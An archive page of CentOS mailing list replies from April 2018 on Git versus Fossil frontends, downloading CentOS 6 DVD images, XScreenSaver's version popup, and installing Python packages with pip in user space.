https://lists.centos.org/mailman/listinfo/centos -- ++++++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] git public web frontends
the rest until he has something coherent to push up through the commit hierarchy towards the core. Thus “fork me on GitHub”, the private stash, rebase, etc. I believe this is also why GitHub’s commit view looks “flat:” the Git esthetic is that everything is made to appear as though it happened in a perfectly coordinated fashion even though the actual development process was an otherwise unmanageable mess. You need these design choices when, like the Linux kernel, you have thousands of developers in hundreds of companies, plus innumerable singletons running around providing drive-by patches. Fossil, by contrast, records what happens, as it happens, publicly. It’s better suited to the vast majority of projects, where the developers are expected to work closely together. Fossil is a coordination tool for coordinated teams, whereas Git is a coordination tool for herds of cats. :) Again I ask, which project does yours most closely resemble from a development process standpoint: SQLite or the Linux kernel? An outsider who didn’t understand the nature of network effects and didn’t watch the history happen might assume that the majority of developers believe they have Linus Torvalds’ problems, and thus also need a tool specifically crafted to meet his needs. For those with existing Git repositories, Fossil has an import mechanism: https://fossil-scm.org/index.html/doc/trunk/www/inout.wiki …and an export mechanism if you later decide that you really do have Linus Torvalds’ same problems. :) Or more likely, that you really do need the benefit of the network effects. but it does need to parse markdown as all my documentation is in markdown. Fossil does that just fine. The dialect differs a bit from GitHub-flavored Markdown, but it’s quite usable. Fossil also allows pure HTML and a wiki dialect. Preferably something that "just works" with CentOS 7. Fossil doesn’t seem to be packaged in any of the major CentOS repositories, but the official binary appears to run on CentOS 7: https://fossil-scm.org/index.html/uv/download.html I say “appears to” because I normally use binaries I build from source, since I frequently like to try out upcoming features and such. Fossil’s development trunk is generally quite stable without being moribund, which is a sign of a well-managed and healthy project. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Down C6 ALL without torrent ?
On Wed, April 18, 2018 8:58 pm, Always Learning wrote: > > Hi Valeri, > >> > Is it possible to download C6 combined parts 1 and 2 not using Torrent >> ? > >> Paul, you can go directly to the mirror server I maintain, it allows >> direct download of DVD images: >> >> http://bay.uchicago.edu/centos > > I looked, but could not find a non-Torrent option for C6 combined parts > 1 and 2 .. > > Index of /centos/6.9/isos/x86_64 > * Parent Directory > * 0_README.txt > * CentOS-6.9-x86_64-LiveDVD.iso > * CentOS-6.9-x86_64-LiveDVD.torrent > * CentOS-6.9-x86_64-bin-DVD1.iso > * CentOS-6.9-x86_64-bin-DVD1to2.torrent > * CentOS-6.9-x86_64-bin-DVD2.iso > * CentOS-6.9-x86_64-minimal.iso > * CentOS-6.9-x86_64-minimal.torrent > * CentOS-6.9-x86_64-netinstall.iso > * CentOS-6.9-x86_64-netinstall.torrent > * README.txt > * md5sum.txt > * md5sum.txt.asc > * sha1sum.txt > * sha1sum.txt.asc > * sha256sum.txt > * sha256sum.txt.asc > > > I sought: CentOS-6.9-x86_64-bin-DVD1to2.iso Aha, now I understand what you want. It probably doesn't exist on master repository server. You can re-master DVD from two of them or from a copy of content of both in some directory on hard drive. Thanks. Valeri > > I suppose I could copy DVD1 to a USB stick and then DVD2 to another USB > stick ? > > It would be nice to have everything (part 1 and part 2) on the same > bootable USB stick. > > > Thank you. > > > -- > Regards, > > Paul. > England, EU. England's place is in the European Union. > > ___________ > CentOS mailing list > CentOS@centos.org > https://lists.centos.org/mailman/listinfo/centos > Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Down C6 ALL without torrent ?
On Wed, April 18, 2018 8:36 pm, Always Learning wrote: > Hi, > > I have a machine with a BIOS that does not permit DVD installation. It > accepts everything else including some old superseded media types. > > Is it possible to download C6 combined parts 1 and 2 not using Torrent ? > > I have an aversion to using anything that comes from unknown sources, as > used by Torrent. Paul, you can go directly to the mirror server I maintain, it allows direct download of DVD images: http://bay.uchicago.edu/centos You may prefer mirror geographically closer to you. Good luck. Valeri > > Thank you. > > > > -- > Regards, > > Paul. > England, EU. England's place is in the European Union. > > ___ > CentOS mailing list > CentOS@centos.org > https://lists.centos.org/mailman/listinfo/centos > Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] XScreenSaver
On Mon, April 9, 2018 8:34 pm, Stephen John Smoogen wrote: > On 9 April 2018 at 04:47, Tom Grace <lists...@deathbycomputers.co.uk> > wrote: >> On 09/04/2018 07:47, Nicolas Kovacs wrote: >>> I didn't know a screensaver was that critical. >> >> It's critical in that XScreenSaver deals with locking the screen/dealing >> with passwords. I believe the fancy animation bits are separate. >> ___ >> CentOS mailing list >> CentOS@centos.org >> https://lists.centos.org/mailman/listinfo/centos > > xscreensaver is security critical for the following reasons: > 1. Several of the screensavers take user input which may not be the > main user. If the software has a security problem. those plugins could > overwrite the users data. > 2. If the user is expecting that the xscreensaver is locking out a > user and it does not then that is security related > 3. The way X works is that every X application can listen to all mouse > and keyboard actions. This also has a security context. > > For many sites, any of these make Xscreensaver into a high security > item. It makes perfect sense from jwz's point of view because several > times something 'simple' in an xscreensaver code has turned into a > meltdown somewhere. And the fact that people email him before emailing > the EPEL maintainer or opening a bugzilla about it says his time is > better served saying "not my problem mate." Thanks, Stephen, for returning the sanity to the World! Valeri > > -- > Stephen J Smoogen. > ___ > CentOS mailing list > CentOS@centos.org > https://lists.centos.org/mailman/listinfo/centos > Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Semi-OT: install python package in userspace
On 04/09/18 11:15, Paul Heinlein wrote: On Sat, 7 Apr 2018, Pete Biggs wrote: Does CentOS changed the package management? :-) Quite. This is not an Ubuntu dig, but when I challenge some of the users about the more dangerous sudo's they try, inevitably they say they got the command from the net, and by that they usually mean Ubuntu forums. Whether the instructions come from the Ubuntu forums or not, we regularly experience the same thing: users unthinkingly following instructions in a REAME or posted on a web page. My experience suggests these folks are just on autopilot. Sadly, people became zombies. The ability to categorize (hence use the menu) is wiped completely. Even the majority of "modern" Desktop Environment interfaces expect you to search for what you need instead of giving the menu: everything arranged by category. That's why I switched to MATE quite a while ago. I guess, I didn't blend in into iPad generation... Soon we will ask google how much money we have in our wallet ;-) Valeri We don't even follow up any more on most of the alerts; they'll ask us if it's important. So we rarely give out sudo on shared systems and when we do there's some "extreme vetting" going on. Also, Python has such a mature virtual-environment setup that more publicly posted instructions are using that route anyway. -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] XScreenSaver
On Sun, April 8, 2018 6:54 am, Nicolas Kovacs wrote: > Hi, > > I'm currently moving all our local school's desktop clients from > Slackware 14.1 to CentOS 7 + Xfce. Right now I'm fine-tuning the default > user profile. This is a big change, so it must be prompted by substantial reason. Would you mind share it: what about slackware was that bad to prompt it. Thanks a lot for your insights! Valeri > > I have a problem with XScreenSaver. The application per se works very > well. Only there's a hard-coded pop-up window that reminds the user that > he's not running the latest version. So, if I'm running version 5.36 as > provided by the EPEL repo and not the latest and greatest 5.38 as > provided upstream, I get a pestering pop-up window informing me that > YOUR VERSION OF XSCREENSAVER IS VERY OLD. This functionality is > apparently hard-coded, since there's no way to deactivating it. > > The Slackware distribution seems to have solved the problem by promising > upstream to keep things up-to-date. > > For the moment I simply work without it, because I'm annoyed by my users > phoning me and asking me what's this thing with their screensaver being > too old. > > As far as I can tell, there would be several solutions to this problem. > > 1. Ask the EPEL maintainers to keep the application up-to-date. > > 2. Patch the darn thing so I don't get the annoying popup. > > 3. Maintain my own up-to-date version of XScreenSaver in my private repo. > > Any thoughts about this? > > Cheers, > > Niki > -- > Microlinux - Solutions informatiques durables > 7, place de l'église - 30730 Montpezat > Site : https://www.microlinux.fr > Blog : https://blog.microlinux.fr > Mail : i...@microlinux.fr > Tél. : 04 66 63 10 32 > ___ > CentOS mailing list > CentOS@centos.org > https://lists.centos.org/mailman/listinfo/centos > Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Semi-OT: install python package in userspace
On 04/06/18 13:58, Richard Demeny wrote: python has nothing to do with snakes. it was named after a television show.. As one comedian said: sense of humor is a money: either you have it or don't ;-) No offense intended, just trying to make Friday brighter... Valeri PS And Jupyter has nothing to with planetary system and misspelling. Just a crapy way to call a project IMHO. Probably almost as bad as "MacOS X". Did you try to search for the last one any time during the first year if its existence? Then you know what I mean. Yes, people with the brain finally switched to using numbers: "10"... On Fri, Apr 6, 2018 at 7:53 PM, Valeri Galtsev <galt...@kicp.uchicago.edu> wrote: On 04/06/18 13:51, Ulf Volmer wrote: On 06.04.2018 18:25, m.r...@5-cent.us wrote: CentOS 7 box. As there's no package in any of the repos, we're trying to install scikit-learn in the user's space. It refuses. My late try was, after d/l a .whl from last year, hoping that would work with the numpy package in the regular repos, I did a pip install --user scikit-learn..., and it still seems to want to write to system space: OSError: [Errno 13] Permission denied: '/usr/lib64/python2.7/site-packages/numpy-1.7.1.dist-info can't reproduce your issue: [ulf@centos7-x1 ~]$ pip install --user scikit-learn Collecting scikit-learn Downloading scikit_learn-0.19.1-cp27-cp27mu-manylinux1_x86_64.whl (12.2MB) 100% || 12.2MB 101kB/s Installing collected packages: scikit-learn Successfully installed scikit-learn-0.19.1 You are using pip version 8.1.2, however version 9.0.3 is available. You should consider upgrading via the 'pip install --upgrade pip' command. But on my testbox, i'm not sucessful to use the system numpy and scipy packages. i had to install them using pip. Python is a "sneaky snake" ;-) Valeri best regards Ulf ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos